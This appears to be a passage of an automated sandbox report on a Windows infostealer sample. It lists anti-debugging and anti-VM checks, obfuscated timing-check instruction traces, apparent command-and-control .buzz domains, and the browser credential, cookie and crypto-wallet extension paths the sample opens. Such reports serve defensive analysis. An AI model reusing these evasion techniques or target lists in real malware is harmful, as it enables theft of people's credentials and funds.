                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00778 second address: 4A007B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF3D0F68BB3h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esi, eax 0x0000000e pushad 0x0000000f mov ebx, ecx 0x00000011 mov edx, eax 0x00000013 popad 0x00000014 test esi, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF3D0F68BB5h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A007B3 second address: 4A00025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FF44176F5C3h 0x0000000f xor eax, eax 0x00000011 jmp 00007FF3D0D5AE6Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov esi, eax 0x00000023 xor ebx, ebx 0x00000025 cmp esi, 00000000h 0x00000028 je 00007FF3D0D81875h 0x0000002e call 00007FF3D4E4D77Ch 0x00000033 mov edi, edi 0x00000035 pushad 0x00000036 mov di, F746h 0x0000003a mov edx, 0CDB41D2h 0x0000003f popad 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF3D0D81745h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00025 second address: 4A000EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF3D0F68BB3h 0x00000013 xor ecx, 4F1AA3DEh 0x00000019 jmp 00007FF3D0F68BB9h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 jmp 00007FF3D0F68BACh 0x00000028 pushfd 0x00000029 jmp 00007FF3D0F68BB2h 0x0000002e xor cx, 9B08h 0x00000033 jmp 00007FF3D0F68BABh 0x00000038 popfd 0x00000039 popad 0x0000003a xchg eax, ecx 0x0000003b jmp 00007FF3D0F68BB6h 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov ax, 4E03h 0x00000048 pushfd 0x00000049 jmp 00007FF3D0F68BB8h 0x0000004e adc ah, FFFFFFC8h 0x00000051 jmp 00007FF3D0F68BABh 0x00000056 popfd 0x00000057 popad 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A000EF second address: 4A00107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3D0D81744h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00107 second address: 4A0010B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A0010B second address: 4A0011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A0011A second address: 4A0011E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A0011E second address: 4A00122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00122 second address: 4A00128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00BEA second address: 4A00C3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov di, ax 0x0000000d jmp 00007FF3D0D81742h 0x00000012 popad 0x00000013 cmp dword ptr [7544459Ch], 05h 0x0000001a jmp 00007FF3D0D81740h 0x0000001f je 00007FF44175F514h 0x00000025 jmp 00007FF3D0D81740h 0x0000002a pop ebp 0x0000002b pushad 0x0000002c pushad 0x0000002d mov edi, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00C5D second address: 4A00C86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 33B9BD5Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF3D0F68BACh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00D49 second address: 4A00DDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 mov edi, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test al, al 0x0000000c jmp 00007FF3D0D81748h 0x00000011 je 00007FF44175534Eh 0x00000017 pushad 0x00000018 call 00007FF3D0D8173Eh 0x0000001d mov bl, cl 0x0000001f pop ebx 0x00000020 pushfd 0x00000021 jmp 00007FF3D0D8173Ch 0x00000026 sub esi, 2845C278h 0x0000002c jmp 00007FF3D0D8173Bh 0x00000031 popfd 0x00000032 popad 0x00000033 cmp dword ptr [ebp+08h], 00002000h 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FF3D0D81744h 0x00000041 jmp 00007FF3D0D81745h 0x00000046 popfd 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10AE1 second address: 4A10AE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10AE7 second address: 4A10B00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D8173Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10B00 second address: 4A10B1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10B1C second address: 4A10B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF3D0D81741h 0x00000009 sbb ch, 00000046h 0x0000000c jmp 00007FF3D0D81741h 0x00000011 popfd 0x00000012 mov si, 20F7h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b call 00007FF3D0D81744h 0x00000020 movzx ecx, dx 0x00000023 pop edx 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007FF3D0D8173Ah 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov di, ax 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10B7B second address: 4A10BDE instructions: 0x00000000 rdtsc 0x00000002 mov dh, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF3D0F68BB5h 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FF3D0F68BB1h 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ax, dx 0x00000019 pushfd 0x0000001a jmp 00007FF3D0F68BAFh 0x0000001f and ah, FFFFFF9Eh 0x00000022 jmp 00007FF3D0F68BB9h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10BDE second address: 4A10C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF3D0D8173Ch 0x00000013 or ecx, 0F7E5EC8h 0x00000019 jmp 00007FF3D0D8173Bh 0x0000001e popfd 0x0000001f mov ecx, 20DD1C3Fh 0x00000024 popad 0x00000025 test esi, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FF3D0D81747h 0x00000030 jmp 00007FF3D0D81743h 0x00000035 popfd 0x00000036 mov di, cx 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10C51 second address: 4A10C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10C57 second address: 4A10C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10C5B second address: 4A10C9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FF4419362FAh 0x0000000e jmp 00007FF3D0F68BB3h 0x00000013 cmp dword ptr [7544459Ch], 05h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF3D0F68BB5h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10D08 second address: 4A10D47 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ax, di 0x0000000a popad 0x0000000b push ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, ebx 0x00000011 pushfd 0x00000012 jmp 00007FF3D0D81745h 0x00000017 xor ax, 86D6h 0x0000001c jmp 00007FF3D0D81741h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10D47 second address: 4A10D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Special instruction interceptor: First address: 9589B7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Special instruction interceptor: First address: AFB363 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Special instruction interceptor: First address: AFB760 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Special instruction interceptor: First address: B2BD26 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Special instruction interceptor: First address: B87428 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe TID: 1464 Thread sleep time: -150000s >= -30000s
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe TID: 1464 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: onaUtwpiyq.exe, onaUtwpiyq.exe, 00000000.00000002.1561200689.0000000000ADF000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696497155j
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1524399042.0000000000792000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1506136966.0000000000791000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1405319597.000000000078B000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1559836333.0000000000792000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560440942.0000000000758000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560751027.0000000000792000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696497155o
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696497155x
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1429856889.00000000053E5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696497155p
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696497155f
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696497155t
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696497155s
                Source: onaUtwpiyq.exe, 00000000.00000002.1561200689.0000000000ADF000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: NTICE
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: SICE
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: onaUtwpiyq.exe String found in binary or memory: hummskitnj.buzz
                Source: onaUtwpiyq.exe String found in binary or memory: appliacnesot.buzz
                Source: onaUtwpiyq.exe String found in binary or memory: cashfuzysao.buzz
                Source: onaUtwpiyq.exe String found in binary or memory: inherineau.buzz
                Source: onaUtwpiyq.exe String found in binary or memory: screwamusresz.buzz
                Source: onaUtwpiyq.exe String found in binary or memory: rebuildeso.buzz
                Source: onaUtwpiyq.exe String found in binary or memory: scentniej.buzz
                Source: onaUtwpiyq.exe String found in binary or memory: mindhandru.buzz
                Source: onaUtwpiyq.exe String found in binary or memory: prisonyfork.buzz
                Source: onaUtwpiyq.exe, onaUtwpiyq.exe, 00000000.00000002.1561200689.0000000000ADF000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: zProgram Manager
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: onaUtwpiyq.exe, onaUtwpiyq.exe, 00000000.00000003.1506136966.0000000000791000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1506033237.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1559763702.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1559590194.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1550901642.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560904316.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1524291361.00000000007F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: onaUtwpiyq.exe PID: 3784, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: onaUtwpiyq.exe, 00000000.00000003.1506136966.0000000000791000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
                Source: onaUtwpiyq.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: onaUtwpiyq.exe, 00000000.00000003.1524399042.0000000000792000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                Source: onaUtwpiyq.exe String found in binary or memory: Wallets/Exodus
                Source: onaUtwpiyq.exe, 00000000.00000003.1524399042.0000000000792000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
                Source: onaUtwpiyq.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: onaUtwpiyq.exe String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
